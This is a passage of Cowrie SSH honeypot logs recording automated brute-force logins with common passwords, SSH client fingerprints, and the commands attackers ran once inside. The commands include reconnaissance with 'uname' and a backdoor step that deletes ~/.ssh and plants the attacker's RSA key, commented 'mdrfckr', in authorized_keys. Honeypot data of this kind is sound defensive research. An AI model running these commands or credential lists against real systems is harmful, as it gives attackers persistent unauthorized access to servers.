0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:05.702541Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:06.132341Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:06.512145Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:33:06.512928Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:06.656970Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:06.658063Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.session.connect","src_ip":"51.68.198.85","src_port":58610,"dst_ip":"1.2.3.4","dst_port":22,"session":"0feb13c309a4","protocol":"ssh","message":"New connection: 51.68.198.85:58610 (1.2.3.4:22) [session: 0feb13c309a4]","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.243253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.243921Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.265806Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.login.success","username":"root","password":"1233","message":"login attempt [root/1233] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.392729Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:08.453823Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.454475Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.455283Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.529856Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:08.583822Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.584515Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.608102Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.609020Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.session.connect","src_ip":"51.68.198.85","src_port":58620,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f5c7664de50","protocol":"ssh","message":"New connection: 51.68.198.85:58620 (1.2.3.4:22) [session: 9f5c7664de50]","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.629202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.629872Z","src_ip":"51.68.198.85","session":"9f5c7664de50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.651724Z","src_ip":"51.68.198.85","session":"9f5c7664de50"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:08.782328Z","src_ip":"51.68.198.85","session":"9f5c7664de50"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:09.807105Z","src_ip":"51.68.198.85","session":"9f5c7664de50"}
{"eventid":"cowrie.session.connect","src_ip":"51.68.198.85","src_port":58632,"dst_ip":"1.2.3.4","dst_port":22,"session":"c974e9b3d417","protocol":"ssh","message":"New connection: 51.68.198.85:58632 (1.2.3.4:22) [session: c974e9b3d417]","sensor":"my-vps","timestamp":"2025-08-28T05:33:09.827918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:33:09.828818Z","src_ip":"51.68.198.85","session":"c974e9b3d417"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:33:09.850391Z","src_ip":"51.68.198.85","session":"c974e9b3d417"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:09.976740Z","src_ip":"51.68.198.85","session":"c974e9b3d417"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:10.000124Z","src_ip":"51.68.198.85","session":"c974e9b3d417"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:10.001062Z","src_ip":"51.68.198.85","session":"0feb13c309a4"}
{"eventid":"cowrie.session.closed","duration":33.909040451049805,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:17.436520Z","src_ip":"8.222.212.69","session":"aeac8d62cef5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41184,"dst_ip":"1.2.3.4","dst_port":22,"session":"6078d16d85cc","protocol":"ssh","message":"New connection: 212.227.235.229:41184 (1.2.3.4:22) [session: 6078d16d85cc]","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.296735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.297848Z","src_ip":"212.227.235.229","session":"6078d16d85cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36018,"dst_ip":"1.2.3.4","dst_port":22,"session":"3441ee8989c7","protocol":"ssh","message":"New connection: 212.227.125.160:36018 (1.2.3.4:22) [session: 3441ee8989c7]","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.429413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.430054Z","src_ip":"212.227.125.160","session":"3441ee8989c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.441849Z","src_ip":"212.227.235.229","session":"6078d16d85cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.535210Z","src_ip":"212.227.125.160","session":"3441ee8989c7"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.847307Z","src_ip":"212.227.125.160","session":"3441ee8989c7"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:20.875910Z","src_ip":"212.227.235.229","session":"6078d16d85cc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:21.952885Z","src_ip":"212.227.125.160","session":"3441ee8989c7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:22.035837Z","src_ip":"212.227.235.229","session":"6078d16d85cc"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":51271,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac08221a97a5","protocol":"ssh","message":"New connection: 80.94.95.15:51271 (1.2.3.4:22) [session: ac08221a97a5]","sensor":"my-vps","timestamp":"2025-08-28T05:33:33.061089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:33:33.062120Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:33:33.113207Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin1","message":"login attempt [admin1/admin1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:33.405033Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin@123","message":"login attempt [admin1/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:34.461380Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abc123","message":"login attempt [admin1/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:35.515180Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abcd123","message":"login attempt [admin1/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:36.569101Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abcd1234","message":"login attempt [admin1/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:37.623831Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:38.677143Z","src_ip":"80.94.95.15","session":"ac08221a97a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47440,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e8caae03c9f","protocol":"ssh","message":"New connection: 212.227.235.229:47440 (1.2.3.4:22) [session: 4e8caae03c9f]","sensor":"my-vps","timestamp":"2025-08-28T05:33:42.256275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:42.258940Z","src_ip":"212.227.235.229","session":"4e8caae03c9f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:42.401585Z","src_ip":"212.227.235.229","session":"4e8caae03c9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56118,"dst_ip":"1.2.3.4","dst_port":22,"session":"91327a75e840","protocol":"ssh","message":"New connection: 212.227.125.160:56118 (1.2.3.4:22) [session: 91327a75e840]","sensor":"my-vps","timestamp":"2025-08-28T05:33:42.750925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:42.770469Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:42.875791Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.000619Z","src_ip":"212.227.235.229","session":"4e8caae03c9f"}
